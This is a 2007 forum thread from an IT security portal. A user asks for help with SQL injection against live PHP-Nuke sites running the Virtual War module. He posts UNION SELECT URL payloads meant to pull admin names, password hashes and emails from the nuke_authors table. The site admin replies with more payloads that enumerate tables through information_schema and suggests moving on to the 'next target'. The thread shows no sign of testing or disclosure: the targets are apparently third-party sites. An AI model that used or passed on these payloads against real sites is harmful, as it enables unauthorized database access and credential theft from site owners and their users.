Waraxe IT Security Portal
Login or Register
November 21, 2024
Menu
Home
Logout
Discussions
Forums
Members List
IRC chat
Tools
Base64 coder
MD5 hash
CRC32 checksum
ROT13 coder
SHA-1 hash
URL-decoder
Sql Char Encoder
Affiliates
y3dips ITsec
Md5 Cracker
User Manuals
AlbumNow
Content
Content
Sections
FAQ
Top
Info
Feedback
Recommend Us
Search
Journal
Your Account
User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144

People Online:
Visitors: 85
Members: 0
Total: 85
Full disclosure
SEC Consult SA-20241112-0 :: Multiple vulnerabilities in Siemens Energy Omnivise T3000 (CVE-2024-38876, CVE-2024-38877, CVE-2024-38878, CVE-2024-38879)
Security issue in the TX Text Control .NET Server for ASP.NET.
SEC Consult SA-20241107-0 :: Multiple Vulnerabilities in HASOMED Elefant and Elefant Software Updater
Unsafe eval() in TestRail CLI
4 vulnerabilities in ibmsecurity
32 vulnerabilities in IBM Security Verify Access
xlibre Xnest security advisory & bugfix releases
APPLE-SA-10-29-2024-1 Safari 18.1
SEC Consult SA-20241030-0 :: Query Filter Injection in Ping Identity PingIDM (formerly known as ForgeRock Identity Management) (CVE-2024-23600)
SEC Consult SA-20241023-0 :: Authenticated Remote Code Execution in Multiple Xerox printers (CVE-2024-6333)
APPLE-SA-10-28-2024-8 visionOS 2.1
APPLE-SA-10-28-2024-7 tvOS 18.1
APPLE-SA-10-28-2024-6 watchOS 11.1
APPLE-SA-10-28-2024-5 macOS Ventura 13.7.1
APPLE-SA-10-28-2024-4 macOS Sonoma 14.7.1
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> PhpNuke -> Virtual War v1.5 R15 help
Post new topicReply to topic View previous topic :: View next topic
Virtual War v1.5 R15 help
PostPosted: Mon Sep 03, 2007 2:47 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Dorsk again,
I have a PHPNUKE website running :
Arrow Platinum 7.6.b.4
Arrow NukeSentinel? 2.4.2pl1
Arrow Virtual War v1.5 R15.

I have been able to use the waraxe strings on many sites with success! But, on this one particular site, I am able to put in this code:
Code:

/modules/vwar/extra/online.php?n=waraxe

And I get what is expected from waraxe's tut.

I am also able to add this:
Code:

/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,@@version,3/*


and I get a version of:
5.0.27-standard

So far, so good.. Well, except the version stated above.

Now, when I put this code in:
Code:

/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,CONCAT(aid,CHAR(94),pwd,CHAR(94),email),3+FROM+nuke_authors/*


I get a "500 Internal Server Error"
Here is what it says:

Code:

Internal Server Error
The server encountered an internal error or misconfiguration and was unable to complete your request.

Please contact the server administrator, webmaster@xxxxx.xxx and inform them of the time the error occurred, and anything you might have done that may have caused the error.

More information about this error may be available in the server error log.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.


What am I doing wrong, or what can I do to fix this.
Also, I have read that getting a "500" error can be a good thing.

I have ran this on other PHPNUKE sites with the same versions/sentinal with great success! So, what is going wrong with this site?

Any help? Smile
View user's profile Send private message
PostPosted: Mon Sep 03, 2007 3:35 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Error 500 in this specific case means, that sql error occurs. Probably webmaster has given phpnuke table index different from "nuke_".
In most cases this can be big problem from attackers point of view, but as this MySql version is >5.0, then you maybe can use information schema system tables to find out phpnuke table names.
How? Like this:

Code:

/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,table_name,3+FROM+information_schema.tables/*


You should see all the sql table names, accessible by your current privileges.
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 03, 2007 4:16 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Odd, I am getting the same 500 error as before, even with this new line waraxe.
I am guessing I will need to find out the db info. I wonder what they may have changed.
View user's profile Send private message
PostPosted: Mon Sep 03, 2007 4:29 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Dorsk wrote:
Odd, I am getting the same 500 error as before, even with this new line waraxe.
I am guessing I will need to find out the db info. I wonder what they may have changed.


Maybe this database wants case-sensitive table names.
Try:

Code:
/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,TABLE_NAME,3+FROM+INFORMATION_SCHEMA.TABLES/*


Or there can be some collision problems, try:

Code:
/modules/vwar/extra/online.php?n=_member+WHERE+0+UNION+ALL+SELECT+1,HEX(TABLE_NAME),3+FROM+INFORMATION_SCHEMA.TABLES/*
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 03, 2007 4:40 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Haha, wow, still the same 500 error. I did make sure everything was correct before I pressed "enter"
View user's profile Send private message
PostPosted: Mon Sep 03, 2007 4:47 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Seems to be problematic target. Maybe give up and select next target? Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 03, 2007 5:11 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




waraxe wrote:
Seems to be problematic target. Maybe give up and select next target? Smile


Haha, it looks that way.

Unless you have any other ideas.

I stated above the PHPNUKE version and sentinal version.

Let me know what you think! Smile
View user's profile Send private message
PostPosted: Mon Sep 03, 2007 5:29 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Well, it's remote server and if you can't see error 500 logs, then it's difficult to overcome this problem ... Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Mon Sep 03, 2007 5:34 pm Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




no worries then. Haha, I will try another route. What other modules can I input script?

I do use the script for the search module. Any others that are good?
View user's profile Send private message
PostPosted: Thu Sep 06, 2007 2:41 pm Reply with quote
waraxe
Site admin
Site admin
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




PHPNuke has many exploits in history.
Look for example @ secunia:

http://secunia.com/product/2385/?task=advisories
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Fri Sep 07, 2007 3:19 am Reply with quote
Dorsk
Regular user
Regular user
Joined: Aug 28, 2007
Posts: 20




Waraxe,
This is some very good finds! I will take a look at these and let you know if I find something that works!

Thanks!
View user's profile Send private message
Virtual War v1.5 R15 help
www.waraxe.us Forum Index -> PhpNuke
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT
Page 1 of 1

Post new topicReply to topic


Powered by phpBB © 2001-2008 phpBB Group



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.036 Seconds